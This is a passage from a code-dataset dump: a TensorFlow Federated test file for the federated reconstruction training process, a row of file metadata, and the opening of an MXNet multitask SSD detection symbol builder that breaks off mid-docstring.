  """The built process is an IterativeProcess with the expected data type."""

  def loss_fn():
    return tf.keras.losses.SparseCategoricalCrossentropy()

  def metrics_fn():
    return [
        tff.learning.metrics.NumExamplesCounter(),
        tff.learning.metrics.NumBatchesCounter(),
        tf.keras.metrics.SparseCategoricalAccuracy()
    ]

  it_process = training_process.build_federated_reconstruction_process(
      local_recon_model_fn,
      loss_fn=loss_fn,
      metrics_fn=metrics_fn,
      client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.1))
  self.assertIsInstance(it_process, tff.templates.IterativeProcess)
  # Second element of `next`'s parameter is the federated dataset placed at
  # CLIENTS; compare its type-signature string.
  federated_data_type = it_process.next.type_signature.parameter[1]
  self.assertEqual(
      str(federated_data_type), '{<x=float32[?,784],y=int32[?,1]>*}@CLIENTS')
def test_fed_recon_with_custom_client_weight_fn(self):
  """Training with a loss-derived client weight should reduce loss."""
  client_data = create_emnist_client_data()
  federated_data = [client_data()]

  def client_weight_fn(local_outputs):
    # Down-weights clients whose final reconstruction loss is high.
    return 1.0 / (1.0 + local_outputs['loss'][-1])

  it_process = training_process.build_federated_reconstruction_process(
      local_recon_model_fn,
      loss_fn=tf.keras.losses.SparseCategoricalCrossentropy,
      client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
      reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
                                                    0.001),
      client_weight_fn=client_weight_fn)
  _, train_outputs, _ = self._run_rounds(it_process, federated_data, 5)
  self.assertLess(train_outputs[-1]['loss'], train_outputs[0]['loss'])
def test_server_update_with_inf_weight_is_noop(self):
  """An infinite client weight must leave the global model unchanged."""
  client_data = create_emnist_client_data()
  federated_data = [client_data()]
  client_weight_fn = lambda x: np.inf
  it_process = training_process.build_federated_reconstruction_process(
      local_recon_model_fn,
      loss_fn=tf.keras.losses.SparseCategoricalCrossentropy,
      client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
      reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
                                                    0.001),
      client_weight_fn=client_weight_fn)
  state, _, initial_state = self._run_rounds(it_process, federated_data, 1)
  # Server deltas are weighted by 1/weight == 0, so trainable variables must
  # be numerically unchanged after one round.  (The original repeated this
  # assertion verbatim -- copy-paste duplicate removed.)
  self.assertAllClose(state.model.trainable, initial_state.model.trainable,
                      1e-8)
def test_keras_global_model(self):
  """Training a fully-global Keras model reports metrics and learns."""

  def loss_fn():
    return tf.keras.losses.SparseCategoricalCrossentropy()

  def metrics_fn():
    return [
        tff.learning.metrics.NumExamplesCounter(),
        tff.learning.metrics.NumBatchesCounter(),
        tf.keras.metrics.SparseCategoricalAccuracy()
    ]

  it_process = training_process.build_federated_reconstruction_process(
      global_recon_model_fn,
      loss_fn=loss_fn,
      metrics_fn=metrics_fn,
      client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
      reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
                                                    0.001))
  server_state = it_process.initialize()
  client_data = create_emnist_client_data()
  federated_data = [client_data(), client_data()]
  server_states = []
  outputs = []
  loss_list = []
  for _ in range(5):
    server_state, output = it_process.next(server_state, federated_data)
    server_states.append(server_state)
    outputs.append(output)
    loss_list.append(output['loss'])
  expected_keys = [
      'sparse_categorical_accuracy', 'loss', 'num_examples', 'num_batches'
  ]
  self.assertCountEqual(outputs[0].keys(), expected_keys)
  self.assertNotAllClose(server_states[0].model.trainable,
                         server_states[1].model.trainable)
  self.assertLess(np.mean(loss_list[2:]), np.mean(loss_list[:2]))
  # 2 clients x 3 examples each; batch_size=2 -> 2 batches per client.
  # (The original repeated these two assertions verbatim -- duplicates
  # removed.)
  self.assertEqual(outputs[0]['num_examples'], 6)
  self.assertEqual(outputs[1]['num_batches'], 4)
def test_keras_local_layer(self):
  """Training with a local final layer reports metrics and learns."""

  def loss_fn():
    return tf.keras.losses.SparseCategoricalCrossentropy()

  def metrics_fn():
    return [
        tff.learning.metrics.NumExamplesCounter(),
        tff.learning.metrics.NumBatchesCounter(),
        tf.keras.metrics.SparseCategoricalAccuracy()
    ]

  it_process = training_process.build_federated_reconstruction_process(
      local_recon_model_fn,
      loss_fn=loss_fn,
      metrics_fn=metrics_fn,
      client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
      reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
                                                    0.001))
  server_state = it_process.initialize()
  client_data = create_emnist_client_data()
  federated_data = [client_data(), client_data()]
  server_states = []
  outputs = []
  loss_list = []
  for _ in range(5):
    server_state, output = it_process.next(server_state, federated_data)
    server_states.append(server_state)
    outputs.append(output)
    loss_list.append(output['loss'])
  expected_keys = [
      'sparse_categorical_accuracy', 'loss', 'num_examples', 'num_batches'
  ]
  self.assertCountEqual(outputs[0].keys(), expected_keys)
  self.assertNotAllClose(server_states[0].model.trainable,
                         server_states[1].model.trainable)
  self.assertLess(np.mean(loss_list[2:]), np.mean(loss_list[:2]))
  # 2 clients x 3 examples each; batch_size=2 -> 2 batches per client.
  # (Verbatim duplicated assertions from the original removed.)
  self.assertEqual(outputs[0]['num_examples'], 6)
  self.assertEqual(outputs[1]['num_batches'], 4)
def test_keras_local_layer_metrics_empty_list(self):
  """With an empty metrics list, only `loss` should be reported."""

  def loss_fn():
    return tf.keras.losses.SparseCategoricalCrossentropy()

  def metrics_fn():
    return []

  it_process = training_process.build_federated_reconstruction_process(
      local_recon_model_fn,
      loss_fn=loss_fn,
      metrics_fn=metrics_fn,
      client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
      reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
                                                    0.001))
  server_state = it_process.initialize()
  client_data = create_emnist_client_data()
  federated_data = [client_data(), client_data()]
  server_states = []
  outputs = []
  loss_list = []
  for _ in range(5):
    server_state, output = it_process.next(server_state, federated_data)
    server_states.append(server_state)
    outputs.append(output)
    loss_list.append(output['loss'])
  expected_keys = ['loss']
  self.assertCountEqual(outputs[0].keys(), expected_keys)
  # Loss trends down and the global model actually moves between rounds.
  self.assertLess(np.mean(loss_list[2:]), np.mean(loss_list[:2]))
  self.assertNotAllClose(server_states[0].model.trainable,
                         server_states[1].model.trainable)
def test_keras_local_layer_metrics_none(self):
  """With metrics_fn=None, only `loss` should be reported."""

  def loss_fn():
    return tf.keras.losses.SparseCategoricalCrossentropy()

  it_process = training_process.build_federated_reconstruction_process(
      local_recon_model_fn,
      loss_fn=loss_fn,
      metrics_fn=None,
      client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
      reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
                                                    0.001))
  server_state = it_process.initialize()
  client_data = create_emnist_client_data()
  federated_data = [client_data(), client_data()]
  server_states = []
  outputs = []
  loss_list = []
  for _ in range(5):
    server_state, output = it_process.next(server_state, federated_data)
    server_states.append(server_state)
    outputs.append(output)
    loss_list.append(output['loss'])
  expected_keys = ['loss']
  self.assertCountEqual(outputs[0].keys(), expected_keys)
  # Loss trends down and the global model actually moves between rounds.
  self.assertLess(np.mean(loss_list[2:]), np.mean(loss_list[:2]))
  self.assertNotAllClose(server_states[0].model.trainable,
                         server_states[1].model.trainable)
def test_keras_joint_training(self):
  """Jointly training local+global variables reports metrics and learns."""

  def loss_fn():
    return tf.keras.losses.SparseCategoricalCrossentropy()

  def metrics_fn():
    return [
        tff.learning.metrics.NumExamplesCounter(),
        tff.learning.metrics.NumBatchesCounter(),
        tf.keras.metrics.SparseCategoricalAccuracy()
    ]

  it_process = training_process.build_federated_reconstruction_process(
      local_recon_model_fn,
      loss_fn=loss_fn,
      metrics_fn=metrics_fn,
      client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
      reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
                                                    0.001),
      jointly_train_variables=True)
  server_state = it_process.initialize()
  client_data = create_emnist_client_data()
  federated_data = [client_data(), client_data()]
  server_states = []
  outputs = []
  loss_list = []
  for _ in range(5):
    server_state, output = it_process.next(server_state, federated_data)
    server_states.append(server_state)
    outputs.append(output)
    loss_list.append(output['loss'])
  expected_keys = [
      'sparse_categorical_accuracy', 'loss', 'num_examples', 'num_batches'
  ]
  self.assertCountEqual(outputs[0].keys(), expected_keys)
  self.assertNotAllClose(server_states[0].model.trainable,
                         server_states[1].model.trainable)
  self.assertLess(np.mean(loss_list[2:]), np.mean(loss_list[:2]))
  # 2 clients x 3 examples each; batch_size=2 -> 2 batches per client.
  # (Verbatim duplicated assertions from the original removed.)
  self.assertEqual(outputs[0]['num_examples'], 6)
  self.assertEqual(outputs[1]['num_batches'], 4)
def test_keras_eval_reconstruction(self):
  """Evaluating during reconstruction doubles the counted examples/batches."""

  def loss_fn():
    return tf.keras.losses.SparseCategoricalCrossentropy()

  def metrics_fn():
    return [
        tff.learning.metrics.NumExamplesCounter(),
        tff.learning.metrics.NumBatchesCounter(),
        tf.keras.metrics.SparseCategoricalAccuracy()
    ]

  it_process = training_process.build_federated_reconstruction_process(
      local_recon_model_fn,
      loss_fn=loss_fn,
      metrics_fn=metrics_fn,
      client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
      reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
                                                    0.001),
      evaluate_reconstruction=True)
  server_state = it_process.initialize()
  client_data = create_emnist_client_data()
  federated_data = [client_data(), client_data()]
  server_states = []
  outputs = []
  loss_list = []
  for _ in range(5):
    server_state, output = it_process.next(server_state, federated_data)
    server_states.append(server_state)
    outputs.append(output)
    loss_list.append(output['loss'])
  expected_keys = [
      'sparse_categorical_accuracy', 'loss', 'num_examples', 'num_batches'
  ]
  self.assertCountEqual(outputs[0].keys(), expected_keys)
  self.assertNotAllClose(server_states[0].model.trainable,
                         server_states[1].model.trainable)
  self.assertLess(np.mean(loss_list[2:]), np.mean(loss_list[:2]))
  # Reconstruction passes are also counted, so totals are double the
  # non-reconstruction case (12 examples, 8 batches).  (Verbatim duplicated
  # assertions from the original removed.)
  self.assertEqual(outputs[0]['num_examples'], 12)
  self.assertEqual(outputs[1]['num_batches'], 8)
def test_keras_eval_reconstruction_joint_training(self):
  """Reconstruction evaluation combined with joint training works end-to-end."""

  def loss_fn():
    return tf.keras.losses.SparseCategoricalCrossentropy()

  def metrics_fn():
    return [
        tff.learning.metrics.NumExamplesCounter(),
        tff.learning.metrics.NumBatchesCounter(),
        tf.keras.metrics.SparseCategoricalAccuracy()
    ]

  it_process = training_process.build_federated_reconstruction_process(
      local_recon_model_fn,
      loss_fn=loss_fn,
      metrics_fn=metrics_fn,
      client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
      reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
                                                    0.001),
      evaluate_reconstruction=True,
      jointly_train_variables=True)
  server_state = it_process.initialize()
  client_data = create_emnist_client_data()
  federated_data = [client_data(), client_data()]
  server_states = []
  outputs = []
  loss_list = []
  for _ in range(5):
    server_state, output = it_process.next(server_state, federated_data)
    server_states.append(server_state)
    outputs.append(output)
    loss_list.append(output['loss'])
  expected_keys = [
      'sparse_categorical_accuracy', 'loss', 'num_examples', 'num_batches'
  ]
  self.assertCountEqual(outputs[0].keys(), expected_keys)
  self.assertLess(np.mean(loss_list[2:]), np.mean(loss_list[:2]))
  self.assertNotAllClose(server_states[0].model.trainable,
                         server_states[1].model.trainable)
  # Reconstruction passes are also counted (12 examples, 8 batches).
  # (Verbatim duplicated assertions from the original removed.)
  self.assertEqual(outputs[0]['num_examples'], 12)
  self.assertEqual(outputs[1]['num_batches'], 8)
def test_custom_model_no_recon(self):
  """MnistModel with reconstruction disabled matches the analytic loss."""
  client_data = create_emnist_client_data()
  train_data = [client_data(batch_size=3), client_data(batch_size=3)]

  def loss_fn():
    return tf.keras.losses.SparseCategoricalCrossentropy()

  def metrics_fn():
    return [
        tff.learning.metrics.NumExamplesCounter(),
        tff.learning.metrics.NumBatchesCounter(),
        tf.keras.metrics.SparseCategoricalAccuracy()
    ]

  # Reconstruction is disabled via a 0 learning rate so the round-0 loss has
  # an exact expected value and decreases by the next round.
  trainer = training_process.build_federated_reconstruction_process(
      MnistModel,
      loss_fn=loss_fn,
      metrics_fn=metrics_fn,
      server_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.01),
      client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
      reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
                                                    0.0))

  state = trainer.initialize()
  round_outputs = []
  round_states = []
  for _ in range(2):
    state, metrics = trainer.next(state, train_data)
    round_outputs.append(metrics)
    round_states.append(state)

  # With all-zero initial weights the logits are zero, so the softmax is
  # uniform over 10 classes and the expected loss is -ln(1/10) = ln(10).
  # This holds in expectation only, hence the relaxed tolerance, and only
  # when the batch size is large enough that clients take a single step.
  self.assertAllClose(round_outputs[0]['loss'], tf.math.log(10.0), rtol=1e-4)
  self.assertLess(round_outputs[1]['loss'], round_outputs[0]['loss'])
  self.assertNotAllClose(round_states[0].model.trainable,
                         round_states[1].model.trainable)
  # 6 recon + 6 training examples seen, but only training hits the metrics.
  self.assertEqual(round_outputs[0]['num_examples'], 6.0)
  self.assertEqual(round_outputs[1]['num_examples'], 6.0)
  # Likewise only the 2 training batches (not the 2 recon ones) are counted.
  self.assertEqual(round_outputs[0]['num_batches'], 2.0)
  self.assertEqual(round_outputs[1]['num_batches'], 2.0)
def test_custom_model_adagrad_server_optimizer(self):
  """Training converges when the server optimizer is Adagrad."""
  client_data = create_emnist_client_data()
  train_data = [client_data(), client_data()]

  def loss_fn():
    return tf.keras.losses.SparseCategoricalCrossentropy()

  def metrics_fn():
    return [
        tff.learning.metrics.NumExamplesCounter(),
        tff.learning.metrics.NumBatchesCounter(),
        tf.keras.metrics.SparseCategoricalAccuracy()
    ]

  # Reconstruction is disabled via a 0 learning rate so the round-0 loss has
  # an exact expected value and decreases by the next round.
  trainer = training_process.build_federated_reconstruction_process(
      MnistModel,
      loss_fn=loss_fn,
      metrics_fn=metrics_fn,
      server_optimizer_fn=functools.partial(tf.keras.optimizers.Adagrad,
                                            0.01),
      client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
      reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
                                                    0.0))

  state = trainer.initialize()
  round_outputs = []
  round_states = []
  for _ in range(2):
    state, metrics = trainer.next(state, train_data)
    round_outputs.append(metrics)
    round_states.append(state)

  # All-zero initial weights give uniform softmax probabilities over the 10
  # classes, so the expected first-round loss is ln(10) (loose tolerance).
  self.assertAllClose(round_outputs[0]['loss'], tf.math.log(10.0), atol=1e-3)
  self.assertLess(round_outputs[1]['loss'], round_outputs[0]['loss'])
  self.assertNotAllClose(round_states[0].model.trainable,
                         round_states[1].model.trainable)
  # 6 recon + 6 training examples seen; only training hits the metrics.
  self.assertEqual(round_outputs[0]['num_examples'], 6.0)
  self.assertEqual(round_outputs[1]['num_examples'], 6.0)
  # 4 recon + 4 training batches seen; only training hits the metrics.
  self.assertEqual(round_outputs[0]['num_batches'], 4.0)
  self.assertEqual(round_outputs[1]['num_batches'], 4.0)
def test_custom_model_zeroing_clipping_aggregator_factory(self):
  """Training works through a zeroing aggregator that never zeroes updates."""
  client_data = create_emnist_client_data()
  train_data = [client_data(), client_data()]

  def loss_fn():
    return tf.keras.losses.SparseCategoricalCrossentropy()

  def metrics_fn():
    return [
        tff.learning.metrics.NumExamplesCounter(),
        tff.learning.metrics.NumBatchesCounter(),
        tf.keras.metrics.SparseCategoricalAccuracy()
    ]

  # An infinite zeroing norm means no client update is ever zeroed out.
  aggregation_factory = tff.aggregators.zeroing_factory(
      zeroing_norm=float('inf'),
      inner_agg_factory=tff.aggregators.MeanFactory())

  # Reconstruction is disabled via a 0 learning rate so the round-0 loss has
  # an exact expected value and decreases by the next round.
  trainer = training_process.build_federated_reconstruction_process(
      MnistModel,
      loss_fn=loss_fn,
      metrics_fn=metrics_fn,
      server_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.01),
      client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
      reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
                                                    0.0),
      aggregation_factory=aggregation_factory,
  )

  state = trainer.initialize()
  round_outputs = []
  round_states = []
  for _ in range(2):
    state, metrics = trainer.next(state, train_data)
    round_outputs.append(metrics)
    round_states.append(state)

  # All-zero initial weights give uniform softmax probabilities over the 10
  # classes, so the expected first-round loss is ln(10) (loose tolerance).
  self.assertAllClose(round_outputs[0]['loss'], tf.math.log(10.0), atol=1e-3)
  self.assertLess(round_outputs[1]['loss'], round_outputs[0]['loss'])
  self.assertNotAllClose(round_states[0].model.trainable,
                         round_states[1].model.trainable)
  # 6 recon + 6 training examples seen; only training hits the metrics.
  self.assertEqual(round_outputs[0]['num_examples'], 6.0)
  self.assertEqual(round_outputs[1]['num_examples'], 6.0)
  # 4 recon + 4 training batches seen; only training hits the metrics.
  self.assertEqual(round_outputs[0]['num_batches'], 4.0)
  self.assertEqual(round_outputs[1]['num_batches'], 4.0)
def test_iterative_process_builds_with_dp_agg_and_client_weight_fn(self):
  """Builder accepts an unweighted DP aggregator plus a client_weight_fn."""

  def loss_fn():
    return tf.keras.losses.SparseCategoricalCrossentropy()

  def metrics_fn():
    return [
        tff.learning.metrics.NumExamplesCounter(),
        tff.learning.metrics.NumBatchesCounter(),
        tf.keras.metrics.SparseCategoricalAccuracy()
    ]

  # A huge finite clip norm leaves updates unchanged; inf itself would zero
  # out all updates once used in multiplication/division.
  gaussian_sum_query = tfp.GaussianSumQuery(l2_norm_clip=1e10, stddev=0)
  dp_sum_factory = tff.aggregators.DifferentiallyPrivateFactory(
      query=gaussian_sum_query,
      record_aggregation_factory=tff.aggregators.SumFactory())
  dp_mean_factory = _DPMean(dp_sum_factory)

  # Some builders raise when an unweighted aggregation is paired with a
  # client_weight_fn; this one should simply build.
  trainer = training_process.build_federated_reconstruction_process(
      MnistModel,
      loss_fn=loss_fn,
      metrics_fn=metrics_fn,
      server_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.01),
      client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
      reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
                                                    0.0),
      aggregation_factory=dp_mean_factory,
      client_weight_fn=lambda local_outputs: 1.0,
  )
  self.assertIsInstance(trainer, tff.templates.IterativeProcess)
def test_execution_with_custom_dp_query(self):
  """End-to-end training through a no-op Gaussian-sum DP aggregator."""
  client_data = create_emnist_client_data()
  train_data = [client_data(), client_data()]

  def loss_fn():
    return tf.keras.losses.SparseCategoricalCrossentropy()

  def metrics_fn():
    return [
        tff.learning.metrics.NumExamplesCounter(),
        tff.learning.metrics.NumBatchesCounter(),
        tf.keras.metrics.SparseCategoricalAccuracy()
    ]

  # A huge finite clip norm leaves updates unchanged; inf itself would zero
  # out all updates once used in multiplication/division.
  gaussian_sum_query = tfp.GaussianSumQuery(l2_norm_clip=1e10, stddev=0)
  dp_sum_factory = tff.aggregators.DifferentiallyPrivateFactory(
      query=gaussian_sum_query,
      record_aggregation_factory=tff.aggregators.SumFactory())
  dp_mean_factory = _DPMean(dp_sum_factory)

  # Reconstruction is disabled via a 0 learning rate so the round-0 loss has
  # an exact expected value and decreases by the next round.
  trainer = training_process.build_federated_reconstruction_process(
      MnistModel,
      loss_fn=loss_fn,
      metrics_fn=metrics_fn,
      server_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.01),
      client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
      reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
                                                    0.0),
      aggregation_factory=dp_mean_factory,
  )

  state = trainer.initialize()
  round_outputs = []
  round_states = []
  for _ in range(2):
    state, metrics = trainer.next(state, train_data)
    round_outputs.append(metrics)
    round_states.append(state)

  # All-zero initial weights give uniform softmax probabilities over the 10
  # classes, so the expected first-round loss is ln(10) (loose tolerance).
  self.assertAllClose(round_outputs[0]['loss'], tf.math.log(10.0), atol=1e-3)
  self.assertLess(round_outputs[1]['loss'], round_outputs[0]['loss'])
  self.assertNotAllClose(round_states[0].model.trainable,
                         round_states[1].model.trainable)
  # 6 recon + 6 training examples seen; only training hits the metrics.
  self.assertEqual(round_outputs[0]['num_examples'], 6.0)
  self.assertEqual(round_outputs[1]['num_examples'], 6.0)
  # 4 recon + 4 training batches seen; only training hits the metrics.
  self.assertEqual(round_outputs[0]['num_batches'], 4.0)
  self.assertEqual(round_outputs[1]['num_batches'], 4.0)
def test_custom_model_eval_reconstruction_multiple_epochs(self):
  """Growing recon epochs and capped post-recon steps show in the counters."""
  client_data = create_emnist_client_data()
  train_data = [client_data(), client_data()]

  def loss_fn():
    return tf.keras.losses.SparseCategoricalCrossentropy()

  def metrics_fn():
    return [
        tff.learning.metrics.NumExamplesCounter(),
        tff.learning.metrics.NumBatchesCounter(),
        tf.keras.metrics.SparseCategoricalAccuracy()
    ]

  dataset_split_fn = reconstruction_utils.build_dataset_split_fn(
      recon_epochs_max=3,
      recon_epochs_constant=False,
      post_recon_epochs=4,
      post_recon_steps_max=3)

  trainer = training_process.build_federated_reconstruction_process(
      MnistModel,
      loss_fn=loss_fn,
      metrics_fn=metrics_fn,
      client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
      reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
                                                    0.001),
      evaluate_reconstruction=True,
      dataset_split_fn=dataset_split_fn)

  state = trainer.initialize()
  round_outputs = []
  round_states = []
  for _ in range(2):
    state, metrics = trainer.next(state, train_data)
    round_outputs.append(metrics)
    round_states.append(state)

  self.assertLess(round_outputs[1]['loss'], round_outputs[0]['loss'])
  self.assertNotAllClose(round_states[0].model.trainable,
                         round_states[1].model.trainable)
  # Round 0: 6 recon + 10 training examples.
  self.assertEqual(round_outputs[0]['num_examples'], 16.0)
  # Round 1: 12 recon + 10 training examples (recon epochs grow per round).
  self.assertEqual(round_outputs[1]['num_examples'], 22.0)
  # Round 0: 4 recon + 6 training batches.
  self.assertEqual(round_outputs[0]['num_batches'], 10.0)
  # Round 1: 8 recon + 6 training batches.
  self.assertEqual(round_outputs[1]['num_batches'], 14.0)
def test_custom_model_eval_reconstruction_split_multiple_epochs(self):
  """Split datasets with repeated epochs yield stable per-round counters."""
  client_data = create_emnist_client_data()
  # 3 single-example batches per user. With dataset splitting, even-indexed
  # examples go to recon (2 per user) and odd-indexed ones to post-recon
  # (1 per user).
  train_data = [client_data(batch_size=1), client_data(batch_size=1)]

  def loss_fn():
    return tf.keras.losses.SparseCategoricalCrossentropy()

  def metrics_fn():
    return [
        tff.learning.metrics.NumExamplesCounter(),
        tff.learning.metrics.NumBatchesCounter(),
        tf.keras.metrics.SparseCategoricalAccuracy()
    ]

  dataset_split_fn = reconstruction_utils.build_dataset_split_fn(
      recon_epochs_max=3, split_dataset=True, post_recon_epochs=5)

  trainer = training_process.build_federated_reconstruction_process(
      MnistModel,
      loss_fn=loss_fn,
      metrics_fn=metrics_fn,
      client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
      evaluate_reconstruction=True,
      dataset_split_fn=dataset_split_fn)

  state = trainer.initialize()
  round_outputs = []
  round_states = []
  for _ in range(2):
    state, metrics = trainer.next(state, train_data)
    round_outputs.append(metrics)
    round_states.append(state)

  self.assertLess(round_outputs[1]['loss'], round_outputs[0]['loss'])
  self.assertNotAllClose(round_states[0].model.trainable,
                         round_states[1].model.trainable)
  # Each round: 12 recon + 10 training examples.
  self.assertEqual(round_outputs[0]['num_examples'], 22.0)
  self.assertEqual(round_outputs[1]['num_examples'], 22.0)
  # Each round: 12 recon + 10 training batches (1 example per batch).
  self.assertEqual(round_outputs[0]['num_batches'], 22.0)
  self.assertEqual(round_outputs[1]['num_batches'], 22.0)
def test_custom_model_eval_reconstruction_disable_post_recon(self):
  """Ensures we can disable post-recon on a client via custom `DatasetSplitFn`."""
  client_data = create_emnist_client_data()
  train_data = [client_data(batch_size=3), client_data(batch_size=2)]

  def loss_fn():
    return tf.keras.losses.SparseCategoricalCrossentropy()

  def metrics_fn():
    return [
        tff.learning.metrics.NumExamplesCounter(),
        tff.learning.metrics.NumBatchesCounter(),
        tf.keras.metrics.SparseCategoricalAccuracy()
    ]

  def dataset_split_fn(client_dataset, round_num):
    del round_num  # Unused.
    # Recon sees every batch twice; post-recon skips the first batch, so one
    # user contributes a single 1-example batch and the other contributes
    # nothing after reconstruction.
    return client_dataset.repeat(2), client_dataset.skip(1)

  trainer = training_process.build_federated_reconstruction_process(
      MnistModel,
      loss_fn=loss_fn,
      metrics_fn=metrics_fn,
      client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
      evaluate_reconstruction=True,
      jointly_train_variables=True,
      dataset_split_fn=dataset_split_fn)

  state = trainer.initialize()
  round_outputs = []
  round_states = []
  for _ in range(2):
    state, metrics = trainer.next(state, train_data)
    round_outputs.append(metrics)
    round_states.append(state)

  # One client still produces a delta that updates the global weights, so
  # the server state changes between rounds and the loss keeps decreasing.
  self.assertLess(round_outputs[1]['loss'], round_outputs[0]['loss'])
  self.assertNotAllClose(round_states[0].model.trainable,
                         round_states[1].model.trainable)
  # Each round: 12 recon examples + 1 post-recon training example.
  self.assertEqual(round_outputs[0]['num_examples'], 13.0)
  self.assertEqual(round_outputs[1]['num_examples'], 13.0)
  # Each round: 6 recon batches + 1 post-recon training batch.
  self.assertEqual(round_outputs[0]['num_batches'], 7.0)
  self.assertEqual(round_outputs[1]['num_batches'], 7.0)
def test_get_model_weights(self):
  """`get_model_weights` always mirrors the trainable weights in state."""
  client_data = create_emnist_client_data()
  federated_data = [client_data()]

  it_process = training_process.build_federated_reconstruction_process(
      local_recon_model_fn,
      loss_fn=tf.keras.losses.SparseCategoricalCrossentropy,
      client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
      reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
                                                    0.001))
  state = it_process.initialize()

  def check_model_weights(current_state):
    # The extracted weights must be a ModelWeights whose trainable part
    # matches the server state's trainable variables.
    weights = it_process.get_model_weights(current_state)
    self.assertIsInstance(weights, tff.learning.ModelWeights)
    self.assertAllClose(current_state.model.trainable, weights.trainable)

  check_model_weights(state)
  for _ in range(3):
    state, _ = it_process.next(state, federated_data)
    check_model_weights(state)
# Script entry point: discover and run all TF test cases in this module.
if __name__ == '__main__':
  tf.test.main()
| 37.97546
| 84
| 0.688718
| 4,489
| 37,140
| 5.461573
| 0.089107
| 0.020843
| 0.043072
| 0.044051
| 0.803443
| 0.796468
| 0.78366
| 0.765306
| 0.758902
| 0.742709
| 0
| 0.019581
| 0.207943
| 37,140
| 977
| 85
| 38.01433
| 0.813849
| 0.125848
| 0
| 0.734266
| 0
| 0
| 0.031313
| 0.005471
| 0
| 0
| 0
| 0
| 0.135664
| 1
| 0.099301
| false
| 0.001399
| 0.015385
| 0.057343
| 0.193007
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2224664a7c3b4e619986dec9d26540777519f5a9
| 39,794
|
py
|
Python
|
symbol/multitask_symbol_builder.py
|
ChunGaoY/DSPnet
|
8fad61059d85ad0cd1f7790c37b5e0478dccb158
|
[
"MIT"
] | 33
|
2018-04-18T06:52:16.000Z
|
2021-09-26T20:57:56.000Z
|
symbol/multitask_symbol_builder.py
|
ChunGaoY/DSPnet
|
8fad61059d85ad0cd1f7790c37b5e0478dccb158
|
[
"MIT"
] | 4
|
2018-07-09T07:09:15.000Z
|
2020-04-12T12:43:36.000Z
|
symbol/multitask_symbol_builder.py
|
liangfu/dspnet
|
8fad61059d85ad0cd1f7790c37b5e0478dccb158
|
[
"MIT"
] | 10
|
2018-04-19T08:17:01.000Z
|
2021-09-26T20:57:57.000Z
|
import mxnet as mx
from common import multi_layer_feature, multibox_layer, multitask_layer
from symbol.resnet import residual_unit
# Epsilon passed to every BatchNorm layer in this module.
eps = 2e-5
# Whether BatchNorm layers use global (inference-time) statistics.
use_global_stats = False
# Number of semantic-segmentation output classes fed to score3_conv.
# NOTE(review): presumably the 19 Cityscapes train classes — confirm.
seg_classes = 19
def import_module(module_name):
    """Import `module_name`, making this file's siblings importable.

    Ensures the directory containing this file is on ``sys.path`` so modules
    living next to this script can be imported by bare name.

    Parameters
    ----------
    module_name : str
        Name of the module to import.

    Returns
    -------
    module
        The imported module object.
    """
    import os
    import sys
    import importlib
    module_dir = os.path.dirname(__file__)
    # Fix: only append once — the original appended on every call, growing
    # sys.path without bound across repeated imports.
    if module_dir not in sys.path:
        sys.path.append(module_dir)
    return importlib.import_module(module_name)
#------------------------------------------------------------------
# SINGLE TASK: DETECTION + DEPTH ESTIMATION
#------------------------------------------------------------------
def get_det_symbol_train(network, num_classes, from_layers, num_filters, strides, pads,
                         sizes, ratios, normalizations=-1, steps=[], min_filter=128,
                         nms_thresh=0.5, force_suppress=False, nms_topk=400, **kwargs):
    """Build network symbol for training SSD

    Parameters
    ----------
    network : str
        base network symbol name
    num_classes : int
        number of object classes not including background
    from_layers : list of str
        feature extraction layers, use '' for add extra layers
        For example:
        from_layers = ['relu4_3', 'fc7', '', '', '', '']
        which means extract feature from relu4_3 and fc7, adding 4 extra layers
        on top of fc7
    num_filters : list of int
